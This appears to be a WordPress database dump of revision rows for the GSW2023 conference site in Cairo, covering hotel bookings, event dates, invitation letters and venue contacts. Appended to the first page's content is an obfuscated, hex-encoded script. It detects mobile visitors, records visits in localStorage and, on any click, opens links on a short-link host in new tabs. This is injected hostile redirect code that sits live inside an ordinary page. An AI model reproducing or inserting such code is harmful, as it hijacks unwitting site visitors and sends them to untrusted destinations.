link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 00:39:25','2023-07-10 00:39:25','',3066,'https://gsw2023.com/?p=4984',0,'revision','',0),
(4987,1,'2023-07-10 00:54:47','2023-07-10 00:54:47','','image','','inherit','open','closed','','image','','','2023-07-10 00:54:47','2023-07-10 00:54:47','',3066,'https://gsw2023.com/wp-content/uploads/2023/07/image.png',0,'attachment','image/png',0),
(4988,1,'2023-07-10 00:55:30','2023-07-10 00:55:30','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 